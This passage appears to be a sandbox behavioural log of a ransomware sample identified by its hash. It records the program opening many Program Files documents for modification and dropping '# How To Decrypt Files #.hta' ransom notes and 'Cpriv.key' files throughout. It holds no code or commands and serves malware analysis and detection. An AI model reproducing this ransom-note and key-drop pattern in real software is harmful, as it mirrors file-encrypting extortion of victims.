de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSWAVY.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216858.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FEZIP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\BOMB.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Photo Viewer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PROFILE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CANYON\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mset7en.kic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.NZ.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg_orange.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\OCT.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CAPSULES\CAPSULES.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCARD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN096.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Invite or Link.one de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PSRCHLEX.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALSO11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\AdjacencyLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANE.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01630_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21333_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR15F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\RenderingControl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL054.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Groove.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZFORM.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\ACTIVITL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03513_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GROOVE_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15274_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\messageboxalert.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Major Indicies.iqy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00734_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART6.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00625_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01357_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BCSClientManifest.man de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Northwind.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15156_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR30F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\VIBE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01186_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\uninstall.log de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00136_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ACCTBOX.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\XDPFile_8.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\amd64\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\FORMS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Configuration\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.es\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18256_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\Hx.HxC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OLAPPT.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\7.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\1.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\JOURNAL\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR10F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\ADDINS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole 